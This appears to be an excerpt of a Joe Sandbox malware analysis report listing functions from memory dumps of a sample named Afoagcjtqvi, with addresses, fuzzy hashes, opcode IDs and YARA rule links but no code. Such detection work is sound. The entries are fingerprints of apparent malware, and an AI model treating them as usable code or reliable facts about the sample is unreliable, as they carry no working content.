                                            • Instruction Fuzzy Hash: D43197B4D042589FCF14DFA9D884A9EFBB1AB49310F20942AE819B7210D735A945CF94
                                            Function 06460D7C Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1916311821.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6460000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q
                                            • API String ID: 0-1614139903
                                            • Opcode ID: 879befcb73353cade3513a5269c904b01ae63a79d09c59de9cb7fd853dc56c54
                                            • Instruction ID: aba75344ec481f1969822acc07e4ab0caa0a76bf78dc457aa26c09d3a0989807
                                            • Opcode Fuzzy Hash: 879befcb73353cade3513a5269c904b01ae63a79d09c59de9cb7fd853dc56c54
                                            • Instruction Fuzzy Hash: AE318930D05259CFDB5ACFAAC5146FEBBB2FB85301F00806BE416AB291C7345A46CF92
                                            Function 06460D98 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1916311821.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6460000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q
                                            • API String ID: 0-1614139903
                                            • Opcode ID: 8c82a18c642877e06dc0ad26221690d86fa9ae4a20cd0918e06213a052597252
                                            • Instruction ID: 40c49e55d25614722b2bbaee9d187c758b5ee03a91ec016e59bbe499795db6f4
                                            • Opcode Fuzzy Hash: 8c82a18c642877e06dc0ad26221690d86fa9ae4a20cd0918e06213a052597252
                                            • Instruction Fuzzy Hash: 1A210C30D00209CFDB59DFAAD5446FEBBB2FB84701F10802AE516A7350C7746945CF92
                                            Function 02F009E4 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1887187318.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_2f00000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te^q
                                            • API String ID: 0-671973202
                                            • Opcode ID: 6c4cf9b3c97357e68aaa484ab021248fc9a05e2084ece134ff4b30eaedb0c2ed
                                            • Instruction ID: 091d2c653f2a427d6db1a35db2c2474376c4e344b01387cd21420ef6a1b76074
                                            • Opcode Fuzzy Hash: 6c4cf9b3c97357e68aaa484ab021248fc9a05e2084ece134ff4b30eaedb0c2ed
                                            • Instruction Fuzzy Hash: 8D110770B001059FD744DF6AD998B6DBBE6AF88740F25446AE506EB3A1CF759D01CB80
                                            Function 0674AF6A Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ?
                                            • API String ID: 0-1684325040
                                            • Opcode ID: 68abc45e13b32d71139a4ab77f2772401731d7ee979a11c767911e71d8cbfed7
                                            • Instruction ID: 67c78bccf1d978038354cf15465678a99d9c443efc5ba6cff2eb02920cb1fa74
                                            • Opcode Fuzzy Hash: 68abc45e13b32d71139a4ab77f2772401731d7ee979a11c767911e71d8cbfed7
                                            • Instruction Fuzzy Hash: 2C11E570944119CFDBA4DF18C898BE9B7F5FB49310F5085EAC40AAB255DB369E86CF00
                                            Function 0674B0E2 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: C
                                            • API String ID: 0-1037565863
                                            • Opcode ID: 8586f20c43d5846e0adb745eaf6b8aaa0bc8de665476cec8762e427a6cfb7a09
                                            • Instruction ID: 5b6a1448a143ac9452e302b191e354569f2b74194f5297dba856f790ce855002
                                            • Opcode Fuzzy Hash: 8586f20c43d5846e0adb745eaf6b8aaa0bc8de665476cec8762e427a6cfb7a09
                                            • Instruction Fuzzy Hash: 4B119BB4D00269CFDB65DFA4C884BECBBB5BB49304F0084E9D509A7204D7359A82DF51
                                            Function 068F0FD8 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917936459.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_68f0000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: y
                                            • API String ID: 0-4225443349
                                            • Opcode ID: c2f6782c17d5d198c7d1c214c3c9f82893f7b52d24909253af7d73fb95d09530
                                            • Instruction ID: 960158f8c1e28b92be59aaff5a3af733b7140913950eb7fae449f80311a1990e
                                            • Opcode Fuzzy Hash: c2f6782c17d5d198c7d1c214c3c9f82893f7b52d24909253af7d73fb95d09530
                                            • Instruction Fuzzy Hash: F211023890512ACFDBE4DF68C898B99B3B5FB49304F1080E9921DA7780CA349EC4CF00
                                            Function 0674AD38 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: )
                                            • API String ID: 0-2427484129
                                            • Opcode ID: 367f8414ab24f20a01e33e7c0d10b410dad8d5d81d348b216f636c6bef597932
                                            • Instruction ID: d4f47f0b7398b9da721a593e532641b67cb675af1a17eabb767c6b7eda93d3ba
                                            • Opcode Fuzzy Hash: 367f8414ab24f20a01e33e7c0d10b410dad8d5d81d348b216f636c6bef597932
                                            • Instruction Fuzzy Hash: 27F0CA7095022ACFEBA0EF18C988BA9B7F1AB09314F1084E9D00EB7244D77A4EC58F11
                                            Function 0674AA67 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: A
                                            • API String ID: 0-3554254475
                                            • Opcode ID: 8d1125df3e07ad39e28991a83147c544f21df0c61d044346e52fc6d64cdf3f84
                                            • Instruction ID: 824300fa652857f2ab55d28371e150940a1f2d615247d001b0af929470cf43c6
                                            • Opcode Fuzzy Hash: 8d1125df3e07ad39e28991a83147c544f21df0c61d044346e52fc6d64cdf3f84
                                            • Instruction Fuzzy Hash: C4F06CB4900228AFDB61DF64D859BDCBBB1AB09300F1081AAA60DB7254DB795E818F50
                                            Function 064AAF34 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1916674755.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_64a0000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te^q
                                            • API String ID: 0-671973202
                                            • Opcode ID: 8e18ca5e9dd360b52072b51b4ab52cf76a41803f8cbaf95f82f65c91ed623a24
                                            • Instruction ID: baf6e6297692c01f1cc9ed73aefadbb983b27a3039668261b1c4633287662239
                                            • Opcode Fuzzy Hash: 8e18ca5e9dd360b52072b51b4ab52cf76a41803f8cbaf95f82f65c91ed623a24
                                            • Instruction Fuzzy Hash: 53F09278E052198FCB54DF28D984B9EBBB2FB49300F1046EA9509A7384DB346E85CF42
                                            Function 0674A154 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 7
                                            • API String ID: 0-1790921346
                                            • Opcode ID: bb75f82d4be347679f8b3dcef2906769364487ace28e547c585cf496e9713341
                                            • Instruction ID: c84cc40d5b4c6b63bdf0a0d2d7a53768bcef9d97f110ddc082808ef56b1dc116
                                            • Opcode Fuzzy Hash: bb75f82d4be347679f8b3dcef2906769364487ace28e547c585cf496e9713341
                                            • Instruction Fuzzy Hash: CFF0C978904269CFDB90DF14C984B98B7B1EB05354F24C4EAD409A7251D73A9F82CF00
                                            Function 06745378 Relevance: .2, Instructions: 213COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 300993cc72a9a229129b229b41a146d22971088593f05043cfc0708440261c47
                                            • Instruction ID: 740afa87fd97b6d213d35b1ef4bb485e4cf13132dfcc0b5a2435bd480c5f121f
                                            • Opcode Fuzzy Hash: 300993cc72a9a229129b229b41a146d22971088593f05043cfc0708440261c47
                                            • Instruction Fuzzy Hash: 37910874905218CFEBA4DF29D888BEDB7B2FF4A301F1081AAD509A7251CB755E85CF41
                                            Function 06740C23 Relevance: .2, Instructions: 190COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dddb4e1de487e6d5a68ca5d26c35b57fe16cd5545e66fd1f7281978bb3fa4d45
                                            • Instruction ID: 39cc1db62cea5e75181e2e0c0d6b86dca552e81a7e509e685a43ef422720c110
                                            • Opcode Fuzzy Hash: dddb4e1de487e6d5a68ca5d26c35b57fe16cd5545e66fd1f7281978bb3fa4d45
                                            • Instruction Fuzzy Hash: 8291F374E00258CFDB94DFA4C988BADBBF1FF89304F5085A9D149AB285CB35598ACF11
                                            Function 06748B58 Relevance: .1, Instructions: 143COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5fd536005ae5ca9a1eb6ad49a407f981605d64527af5781a8999911930c04caa
                                            • Instruction ID: 209532043f098fa521f436baf7401df8e64bec891180d6a22e7482a5a85e53ac
                                            • Opcode Fuzzy Hash: 5fd536005ae5ca9a1eb6ad49a407f981605d64527af5781a8999911930c04caa
                                            • Instruction Fuzzy Hash: 62510570D06208CFEB94DFA9D948BADB7F2FB89300F1091A9D418A7354DB349985CF46
                                            Function 06748B68 Relevance: .1, Instructions: 135COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 53d121e69075c50f5d3b27c554eaf20cfb034e71de78db0ef67b8bfb1f99f4ca
                                            • Instruction ID: d630a976679ba6a4508e044e430be9b1f4914795e002a869c2b083ce4f3b3e5c
                                            • Opcode Fuzzy Hash: 53d121e69075c50f5d3b27c554eaf20cfb034e71de78db0ef67b8bfb1f99f4ca
                                            • Instruction Fuzzy Hash: CC510470E06208CFEB94DFA9D948BADB7F6FB89300F1091A9D418A7350DB389985CF45
                                            Function 06908D70 Relevance: .1, Instructions: 130COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917936459.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_68f0000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9fd0b7f7679c109e3ac57e1f1295d2e7bc6f8d41c716e7849d54d9c9af8a5374
                                            • Instruction ID: f96b255e5ee6b4abba243153a50fd8303cf01a23eebd976bae07fa13f8be6201
                                            • Opcode Fuzzy Hash: 9fd0b7f7679c109e3ac57e1f1295d2e7bc6f8d41c716e7849d54d9c9af8a5374
                                            • Instruction Fuzzy Hash: 0F51EDB4E00219CFEF84DFA9D944AEEBBB6BB89300F10892AD515B7690DB705945CF90
                                            Function 06748BD9 Relevance: .1, Instructions: 127COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 774bf4543f268d8ba36cdace9393e13f0315336202b6f99357bc2e95a096f13a
                                            • Instruction ID: 24c06c33652e9b602b366bdcc210c94b296f1dbbccc7f036ba36e5e7322216a1
                                            • Opcode Fuzzy Hash: 774bf4543f268d8ba36cdace9393e13f0315336202b6f99357bc2e95a096f13a
                                            • Instruction Fuzzy Hash: 7751E370E05219CFDB94DF69D888BADB7B2FB49300F1091A9D419A7750CB389D85CF85
                                            Function 0674596F Relevance: .1, Instructions: 123COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d9fe0ea19e22e6427d66988f2d8fa09298bd6741fe00e3c123bfe8987df4eabc
                                            • Instruction ID: 4cd4748a91a0a5700ba22a477238f13b803fb0d6592a7b9ee83d093a040cffe1
                                            • Opcode Fuzzy Hash: d9fe0ea19e22e6427d66988f2d8fa09298bd6741fe00e3c123bfe8987df4eabc
                                            • Instruction Fuzzy Hash: 9851AE74A01229CFDBA0DF68D898B9DB7B2FB49301F1086AAC509B7341DB355E85CF41
                                            Function 0674C30E Relevance: .1, Instructions: 122COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ab90d97899028c63a72975e4bdbce5d456be0387633f2bbc73c8aef7a4ba505e
                                            • Instruction ID: ebcbadeb177f77b2034e8fc6cc7dbff504238b89ddcf8ea62ecbede4cc437c7b
                                            • Opcode Fuzzy Hash: ab90d97899028c63a72975e4bdbce5d456be0387633f2bbc73c8aef7a4ba505e
                                            • Instruction Fuzzy Hash: 0C510470D02318CFEB54DFA9D948BADBBF5FB08304F1080AAD408AB291D7799A85CF15
                                            Function 06748F24 Relevance: .1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1708fd79451d5c6d29ed61a7ca27a87d0a66d26419f8415a17fb88f3c859f25d
                                            • Instruction ID: c385756ad2303a4f661cdc5ea4e769bab9efc02980a190dcd150f35a6980fc8c
                                            • Opcode Fuzzy Hash: 1708fd79451d5c6d29ed61a7ca27a87d0a66d26419f8415a17fb88f3c859f25d
                                            • Instruction Fuzzy Hash: FB51CF70E02209CFDB90DF69D988BADB7B2FB49300F2090AAD418A7750CB399D85CF45
                                            Function 02F00868 Relevance: .1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1887187318.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_2f00000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bedd943719de6d48b300e8e52a4480c3870d6382569460cf824f3aa18420c225
                                            • Instruction ID: e91aa5eca927137e7d596855368e6c20ea9582d9c2f98d39de18c1e476542cfa
                                            • Opcode Fuzzy Hash: bedd943719de6d48b300e8e52a4480c3870d6382569460cf824f3aa18420c225
                                            • Instruction Fuzzy Hash: 7041C230F002198FDB58AB78946476E3BE6BFC9654F1448ADC50AEB391DF358C0687D6
                                            Function 06748FF2 Relevance: .1, Instructions: 117COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 701a0e682aa14697d2cb9ccccd28ccbf2e9ea47f2ca82edaaef975f1fe094b93
                                            • Instruction ID: 9985051779d873775ffe393f746ebb18ca3ed7141319d0aaec66dc898daca330
                                            • Opcode Fuzzy Hash: 701a0e682aa14697d2cb9ccccd28ccbf2e9ea47f2ca82edaaef975f1fe094b93
                                            • Instruction Fuzzy Hash: 3F51D270E02209CFDB90DFA9D988BADB7B2FB49300F2091A9D409A7750DB399D85CF45
                                            Function 067454DF Relevance: .1, Instructions: 98COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aae9d774435b66e0434622b5c56c62f648f3d043645d1eff4e31391c5dcfec4a
                                            • Instruction ID: fa35a3d89c572c595cd53ac211bed1aecc69f734cc0e85fa2222f1555952a8b2
                                            • Opcode Fuzzy Hash: aae9d774435b66e0434622b5c56c62f648f3d043645d1eff4e31391c5dcfec4a
                                            • Instruction Fuzzy Hash: 3741F674A01229CFEBA0DF68D888BDDB7B1FB4A301F1085AAD549B7251CB795E85CF40
                                            Function 06745369 Relevance: .1, Instructions: 98COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f59fa78057ca32496a7aa6a557d71dfcc041b236fa6d18004f5e5d23aa4e5f90
                                            • Instruction ID: 49d21bd0b0e8dcf11d8465afde96a522e2df6ed1d2d9a1b1f86f4dcf095a8078
                                            • Opcode Fuzzy Hash: f59fa78057ca32496a7aa6a557d71dfcc041b236fa6d18004f5e5d23aa4e5f90
                                            • Instruction Fuzzy Hash: 11314974E04228CFEB64DF6AD8487EDB7F2FB8A304F1081AAD508A7245DB754985CF40
                                            Function 064AA608 Relevance: .1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1916674755.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_64a0000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dbae1b6d8ecbdd9af10605057ae2b075cec2aa737f5a4abc1689a88c1359102b
                                            • Instruction ID: b06e6a9437d139ad1090ddb08b6287d8da01189b778d7c733e377f2c7bd8befa
                                            • Opcode Fuzzy Hash: dbae1b6d8ecbdd9af10605057ae2b075cec2aa737f5a4abc1689a88c1359102b
                                            • Instruction Fuzzy Hash: 7F315770D01209AFDB45CFADD844AEEBBB5FB99300F14906AD454BB350DB714989CFA1
                                            Function 0674B5E8 Relevance: .1, Instructions: 84COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5b3e902a533a8306936574d6bdb17993df531847c1b134f40d0a8bb7fa7a7caa
                                            • Instruction ID: a42a773a17b043409631b23d009e7c658f57539778a23e54b846630e92faf659
                                            • Opcode Fuzzy Hash: 5b3e902a533a8306936574d6bdb17993df531847c1b134f40d0a8bb7fa7a7caa
                                            • Instruction Fuzzy Hash: 5E3165B0C05219CBDF60DFA9D8087EDFBB1AF49310F10859AD518A7251E7329996CF91
                                            Function 02F01B39 Relevance: .1, Instructions: 81COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1887187318.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_2f00000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 852e86c7853a964aabf8d4e43dd7bb643b5be1548baf537bfe624c84df00171b
                                            • Instruction ID: bf364425b77c799de6636fa467c95cf4b2b8dc2fb9359077f15cd611198c28d1
                                            • Opcode Fuzzy Hash: 852e86c7853a964aabf8d4e43dd7bb643b5be1548baf537bfe624c84df00171b
                                            • Instruction Fuzzy Hash: 17316DB0D01209DFD740DFA8D088BAEBBF1FB49754F1084A6C518AB2C1D7744A84DF51
                                            Function 06745689 Relevance: .1, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 53e0fbc3d0d9d1a77ba8564fd7265954b4a3ab79827aabc5258268d9ca15336b
                                            • Instruction ID: bfce57c5dddad5c1fbce06d2c8aa285b82bec2e91b1df702e255c61032a8d70b
                                            • Opcode Fuzzy Hash: 53e0fbc3d0d9d1a77ba8564fd7265954b4a3ab79827aabc5258268d9ca15336b
                                            • Instruction Fuzzy Hash: CE311374900229CFDBA0EF68D888B9CBBB1FB4A301F2045BAD508B7241CB395E85CF44
                                            Function 02F01B50 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1887187318.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_2f00000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 147071e7108e7a5ae40990a44ca7a7d6a5a64f66bba14cd393059dc2c4ae3370
                                            • Instruction ID: 0425f55530827c9893123e5808def140cb22bd1f6c7427702e29efcd2ead4aea
                                            • Opcode Fuzzy Hash: 147071e7108e7a5ae40990a44ca7a7d6a5a64f66bba14cd393059dc2c4ae3370
                                            • Instruction Fuzzy Hash: 583128B4D0120ADFD740DFA8D0887AEBBF5FB49704F1084A5C519A7384EB744A84DF51
                                            Function 0157D030 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1886560434.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_157d000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fc52a005f63d9147c4055c36411b4c23f982a9d71b2567be677895c81db94381
                                            • Instruction ID: 5da5ace015cdd43625f091d42c11ac1001ae6ba4a28dd74c3ea9bac2138759ca
                                            • Opcode Fuzzy Hash: fc52a005f63d9147c4055c36411b4c23f982a9d71b2567be677895c81db94381
                                            • Instruction Fuzzy Hash: D821F1B5504200DFCB12DF58E985B2ABFB5FB84310F24C569D90A0E246D336D816CAA2
                                            Function 0157D006 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1886560434.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_157d000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 51a8817df425b6a4ddab31a798dcf9e984ed718496f9d9c6117f7aed41fcb022
                                            • Instruction ID: 9d32cbf4e48cd25e44ca2f546db953b21338fb4c18c532eb39ea74757467dc84
                                            • Opcode Fuzzy Hash: 51a8817df425b6a4ddab31a798dcf9e984ed718496f9d9c6117f7aed41fcb022
                                            • Instruction Fuzzy Hash: 60217E355093C08FCB03CF64D990715BF71AF46214F2981EBD8458F1A7C33A981ACB62
                                            Function 0674837A Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c8157b7869cdd11acce059e94fd82e7983adc268ebafc7e0b91e80c87ea6fd26
                                            • Instruction ID: a290772d14eedf36f06204ac23c7757332adba18dedf170e701f41150bc4d5c1
                                            • Opcode Fuzzy Hash: c8157b7869cdd11acce059e94fd82e7983adc268ebafc7e0b91e80c87ea6fd26
                                            • Instruction Fuzzy Hash: 5531A234A00219CFDBA4DF64D854B99B7B2FB89200F5085F9950DBB754CB352E85CF91
                                            Function 064A3F58 Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1916674755.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_64a0000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac1449b1494933e880c023d8ba39b3e27c94a67faa1e0e82cefc6ec0ecfacc32
                                            • Instruction ID: 0a38998110278bc80711bc2ea220a71f109376418ff66fb01af1cfc7fa038f1a
                                            • Opcode Fuzzy Hash: ac1449b1494933e880c023d8ba39b3e27c94a67faa1e0e82cefc6ec0ecfacc32
                                            • Instruction Fuzzy Hash: EB216BB4D0420AEFDB55DFA9C1446AEBBF2FB54301F10856AE415A7340D7359986CF90
                                            Function 067455E7 Relevance: .1, Instructions: 66COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
